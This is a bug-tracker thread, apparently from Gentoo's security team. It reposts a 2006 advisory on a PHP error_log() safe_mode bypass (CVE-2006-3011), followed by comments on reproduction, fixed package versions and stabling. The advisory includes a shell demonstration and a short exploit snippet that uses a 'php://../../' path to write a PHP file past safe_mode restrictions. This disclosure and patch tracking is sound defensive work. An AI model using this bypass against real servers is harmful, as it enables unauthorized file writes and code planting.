Comment 1 Wolf Giesen (RETIRED) 2006-06-27 04:05:11 UTC

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 10.6.2006
- -Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
error_log -- Send an error message somewhere.

- --- 1. error_log() Safe Mode Bypass ---
error_log() function send to email, file or display your error message. You can send error messages per mail or write into files. Issue is very simple. error_log() check safe_mode and open_basedir in stream function. But isn't allowed use URL. And problem exists in incorrect filename.

PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
	php_stream *stream = NULL;

	switch (opt_err) {

		case 1:		/*send an email */
			{
#if HAVE_SENDMAIL
				if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
					return FAILURE;
				}
#else
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
				return FAILURE;
#endif
			}
			break;

		case 2:		/*send to an address */
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
			return FAILURE;
			break;

		case 3:		/*save to a file */
			stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
			if (!stream)
				return FAILURE;
			php_stream_write(stream, message, strlen(message));
			php_stream_close(stream);
			break;

		default:
			php_log_err(message TSRMLS_CC);
			break;
	}
	return SUCCESS;
}
- -2013-2050---

Let's see to option 3.

- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
- -2038 line---

Option "a", writte to file error or if file dosen't exists, create new file. 
Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".
IGNORE_URL turn off safe_mode if you use "prefix://../../".

- -Example---
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect.  The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib# 
- -Example---

- --- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>


- --- 3. How to fix ---
No response from PHP Team. We have reported this bug in 11.06.2006

- --- 4. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps
qXoX8VYnwFBa2VmK3zlxpGs=
=VAkg
-----END PGP SIGNATURE-----

Comment 2 Wolf Giesen (RETIRED) 2006-06-27 05:07:11 UTC

CHTEKK reports this as reproducable (somewhat incomplete on 5.1.4, though).

Comment 3 Raphael Marichez (Falco) (RETIRED) 2006-06-27 08:19:41 UTC

NB: i might be wrong, but i thought sec team doesn't handle "safe mode" issues

Comment 4 Wolf Giesen (RETIRED) 2006-06-27 10:25:05 UTC

That would be wise indeed. I admit I didn't really put much thought in it as I was in a hurry @work and just didn't want to let it slip by.

Comment 5 Luca Longinotti (RETIRED) 2006-07-14 09:22:25 UTC

Fixed in dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4.
Stabling of those two PHP versions can be handled in bug 133524.
Best regards, CHTEKK.

Comment 6 Sune Kloppenborg Jeppesen (RETIRED) 2006-07-22 23:53:05 UTC

This one is ready for GLSA decision. I vote NO.

Comment 7 Wolf Giesen (RETIRED) 2006-07-23 01:13:15 UTC

Yeah, probably not worth it. "No".

Comment 8 Stefan Cornelius (RETIRED) 2006-07-23 04:32:31 UTC

"No" and closed, feel free to reopen if you disagree blabla.

Comment 9 Sune Kloppenborg Jeppesen (RETIRED) 2006-07-30 12:53:08 UTC

Reopening for stable marking. Since bug #133524 does not affect remaining arches. Sorry for the mess.

Comment 10 Thierry Carrez (RETIRED) 2006-08-12 08:21:53 UTC

dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4 still miss the hppa mark.

Comment 11 Thierry Carrez (RETIRED) 2006-08-12 08:32:43 UTC

This is superseded by bug 143126 which requires higher versions stable marking.

Comment 12 René Nussbaumer (RETIRED) 2006-08-12 13:16:32 UTC

remove us from cc.